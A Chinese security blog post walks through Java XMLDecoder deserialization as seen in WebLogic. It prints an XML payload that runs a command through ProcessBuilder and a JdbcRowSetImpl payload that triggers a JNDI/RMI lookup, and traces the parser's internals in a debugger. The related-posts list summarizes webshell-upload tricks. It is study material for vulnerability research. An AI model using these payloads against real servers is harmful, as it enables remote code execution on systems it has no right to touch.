XML漏洞分析

已于 2022-08-19 18:08:07 修改
阅读量714 收藏
点赞数 1
分类专栏: 安全 文章标签: xml java
于 2022-08-19 15:15:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/F1or_/article/details/126425337
版权

最近在看之前的weblogic的漏洞,无疑逃不了分析xml这个漏洞,一段简单的demo

<java version="1.7.0_80" class="java.beans.XMLDecoder">

  <object class="java.lang.ProcessBuilder">

​    <array class="java.lang.String" length="1">

​      <void index="0"><string>calc</string></void>

​    </array>

​    <void method="start"></void>

  </object>

</java>

public class test{

  public static void main(String[] args) throws IOException, InterruptedException {

​    XMLDecoder xmlDecoder = new XMLDecoder(new BufferedInputStream(new FileInputStream("b.xml")));

​    Object readObject = xmlDecoder.readObject();

​    //System.out.println(readObject);

​    xmlDecoder.close();

 

  }

简短几行代码就可以成功rce,这里命令执行是ProcessBuilder这个类(jdk1.7.0_21)

在这里插入图片描述

最开始的weblogic的漏洞也是这里开始,只要调用了xmlDecoder.readObject()就可能导致上传恶意xml文件达到rce,之后weblogic也是对这里面的一系列关键字进行过滤,但是还是有被绕过的情况,这个等一会再说。

回到xml这里,直接打断点进行分析

可以发现在第一步的时候就已经传入一个hashmap,里面存放各种标签对应的类

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

后面继续跟进parse这个函数,最后来到这里

在这里插入图片描述

可以看一下堆栈

在这里插入图片描述

最后看到处理xml的地方

在这里插入图片描述

跟进这个函数来到这里,这个函数通过迭代的方式对XML数据的标签进行解析

最后来到这里,scanEndElement,当没扫描到结束字符后,便开始进行解析

在这里插入图片描述

可以看见,我们xml最里面一个标签是<string>calc</string>这个,所以第一个进行解析

在这里插入图片描述

跟了一下到了这里DocumentHandler#endElement

在这里插入图片描述

再跟一下可以到这里,进去可以看一下这个就开始取值了

可以看见这里的函数其实是已经获得了calc,即我们传入的字符了,但是最后却没有返回,返回的是一个带有calc的ValueObjectImpl,而且你可以发现,现在的getValObject是在StringElementHandler的里面,对应前面一开始传入的hashmap对应值,也就是说在这里他截取了</string>这个,然后去hashmap里面找对应的类,然后在getValueObject

在这里插入图片描述

然后进行判断,最终在这里将calc进行赋值给父类

在这里插入图片描述

后面在这里,进行递归this.handler = this.handler.getParent()

在这里插入图片描述

后面再一次进入循环的时候,此时已经是NewElementHandler#getValueObject,但是按照hashmap是应该调用VoidElementHandler#getValueObject,但是VoidElementHandler没有这个方法,于是便找他父类方法,到了这里

在这里插入图片描述

void这里,会将上一次传入的calc继续传
在这里插入图片描述

中间省略一点,直接到这里,通过下面函数直接实例化了

在这里插入图片描述

再一次进入这个循环后,在次getValueObject

在这里插入图片描述

这里会进行一个操作,对后面的有一个jndi很关键,判断property是否为空,然后加入set,get字段,最后将第一个字符转为大写,但是在这里我们传入的是一个<void method="start"></void>,所以判断就都过了,最后在ValueObjectImpl.create(var5.getValue());里面有个invoke,成功执行了

在这里插入图片描述

JNDI

之前说到这里可以jndi,前面xml解析哪里就不说了,直接看关键的吧

<java version="1.8.0_131" class="java.beans.XMLDecoder">

 <void class="com.sun.rowset.JdbcRowSetImpl">

 <void property="dataSourceName">

  <string>rmi://localhost:1099/test</string>

 </void>

 <void property="autoCommit">

  <boolean>true</boolean>

 </void>

 </void>

</java>

调用的是JdbcRowSetImpl这个类,先找到jndi注入点

在这里插入图片描述

可以看见这里是直接调用connect(),既然找到了调用方法,接下来就是看这里面的参数能否可控了

在这里插入图片描述

看一下之前的xml文件,这一部分之前说过,当property不为空就可以进入循环,就是在下图这个位置,然后invoke,直接调用方法了,这里是先进行赋值

在这里插入图片描述

后面这里进行调用方法setAutoCommit,然后到jndi那段代码上去

在这里插入图片描述

最后补张图吧

在这里插入图片描述
CSDN以后时不时来更一下吧
主要还是我的blog:https://f1or.cn

参考文章

https://www.freebuf.com/articles/network/247331.html

http://xxlegend.com/

F1or
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
用友NC接口saveXmlToFIleServlet文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-08 240
用友NC接口saveXmlToFIleServlet文件上传漏洞(含批量验证poc)
F2blog XMLRPC 上传任意文件漏洞
广外女生官方BLOG
09-11 914
 存在漏洞文件:xmlrpc.php,影响:可上传任意文件到服务器。原理:get_http_raw_post_data()是获取最原始的传递过来的数据,也是说不会因为PHP环境的magic为on的影响。而他在check_user_pw的时候,并没有过滤,结合后面的上传没有做后缀判断,所有可以直接导致上传任意文件到服务器。简单分析: function metaWeblog_newMediaO
XML 相关漏洞风险研究
最新发布
有价值炮灰
06-03 1771
使用了这么久 XML,但是对其内部细节却不甚了解,本文就来补全这个缺憾。
XXE&XML 漏洞
weixin_53150482的博客
07-18 166
XXE&XML 漏洞
(39.1)【XML漏洞专题】必备的基础知识、利用原理、构建规则
04-24 1825
【专题】XML利用必备基础知识
xml java 反序列化,Java 反序列化漏洞始末(5)— XML/YAML
weixin_31682031的博客
03-11 626
哔哔两句前面把反序列化漏洞里的一大巨头“JSON”的主要问题给总结了一下,XML 和 YAML 在反序列化漏洞中也能算得上是个很常见的问题。我例举出几个几个 XML 和 YAML 的反序列化漏洞XMLDecoderXStreamSnakeYaml在我遇到的项目里,这三个依赖库最常见。其中 XMLDecoder 不同于其他几个,这个更像是反射漏洞,虽然本质上都是可以反序列化回序列化的数据,但 XM...
NVDCVE2002-2020年3月xml漏洞文件数据合集.zip
05-07
这样的数据结构便于用户通过编程方式将数据导入数据库,或者用于安全研究和漏洞分析,帮助安全专家了解特定时期的漏洞趋势,评估风险,以及制定相应的防护策略。 标签“漏洞库”、“漏洞数据”、“CVE”和“NVD”...
CNNVD漏洞xml.zip
02-22
总结而言,“CNNVD漏洞xml.zip”是一个包含大量历史信息安全漏洞信息的资源,通过解析和分析这些数据,我们不仅可以了解信息安全的历史演变,还能为未来的研究、教育和防护工作提供强有力的支持。对于任何关心信息...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞分析 在 Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞分析。 ...
xml解析工具-静态分析.rar
05-09
8. **静态分析**:在不运行代码的情况下,通过对源代码或二进制文件的分析,来检测潜在的问题,如安全漏洞、性能瓶颈等。XML解析工具的静态分析功能,可以提前发现客户端可能存在的XML相关问题,提高应用的质量和...
白话:文件上传漏洞
追梦者的部落格
03-28 1607
今天,来谈谈关于文件上传漏洞。 很多网站都提供了文件上传功能,用以用户分享自己的东西。但是,这也给网站带来很大的安全隐患,如果网站管理人员或者开发人员不注意的话,将使网站处于非常危险的状态。 常见的不安全因素主要有一下两方面: 对上传文件大小不做限制 我们一般在需要上传文件的网站上,都可以看到对上传文件的大小的限制,如不能超过多少KB或多少MB,这样做的目的主要有以下两个方面考虑: 大
xml的xxe漏洞
m0_48907714的博客
04-25 4202
XXE漏洞 XML概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 XML与HTML的主要差异 XML被设计为传输和存储数据,其焦
XML 相关漏洞
lonmar的博客
07-29 3351
文章目录XML基础基础一个XML示例:XML的格式XML的属性DTD实体(1) 内部实体声明(2) 外部实体声明(3) 参数实体XML注入原理防御XXE注入漏洞介绍XXE类型有回显的本地文件读取读取文件CDATA无回显本地文件读取XXE的其他攻击方式通过XXE漏洞进行内网探测内网主机端口探测:通过XXE漏洞进行命令执行通过XXE漏洞进行DOS攻击XXE的防御:其他资源 XML基础 基础 https://www.cnblogs.com/l0nmar/p/13337996.html 一个XML示例: <?
文件上传漏洞攻击与防范方法
MachineGunJoe666
07-24 1170
写在文本xx.txt中(或者shell语句直接写一句话木马,用菜刀、cknife等直连,只是容易被查杀),然后用命令将shell语句附加在正常图片xx.jpg后copy xx.jpg/b + xx.txt/a test.jpg上传test.jpg,然后访问test.jpg/.php或test.jpg/abc.php当前目录下就会生成一句话木马 shell.php。文件上传攻击的本质就是将恶意文件或者脚本上传到服务器,专业的安全设备防御此类漏洞主要是通过对漏洞的上传利用行为和恶意文件的上传过程进行检测。
反序列化漏洞原理_Weblogic XMLDecoder 反序列化漏洞
weixin_39997194的博客
12-11 575
这次来研究一下weblogic一些反序列化漏洞.主要是: CVE-2017-3506 ,CVE-2017-10271 CVE-2019-2725这三个CVE,就是一个不停绕过的过程.从CVE-2017-3506开始发现,官方设置黑名单,安全研究者绕过了两次.感觉可能会有第三次. 漏洞测试环境参考:Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(...
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1232
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
XML外部实体漏洞 (XXE)简介
allway2的博客
07-27 1229
例如,假设您的应用程序必须从他们的系统中获取用户的操作系统详细信息。例如,他们可以禁用服务器上的防火墙,这将有助于他们发起其他攻击。因此,在这篇博客中,我将解释什么是XXE,以及如何保护您的应用程序免受这种风险的影响。这样做的一部分是为了了解常见的漏洞。如果您有一个使用XML的Web应用程序,那么保护它对您来说很重要。考虑到XXE漏洞可能对您的服务器造成的损害,您不能冒险。因此,黑客可以使用XML外部实体功能修改请求并获取该文件的详细信息。的功能,其中包含有关XML文档结构的信息。...
XXE-XML外部实体注入 漏洞详解
m0_69043895的博客
04-14 1158
XML指可扩展标记语言(Extensible Markup Language)。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。它在 HTML 之后开发,来弥补 HTML的不足。HTML 用于定义数据的展示,专注于它应该是什么样子。反之,XML 用于定义数据如何被组织。例如,HTML中,你的标签为<title>、<h1>、<tab1e>,<p>以及其它标签。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值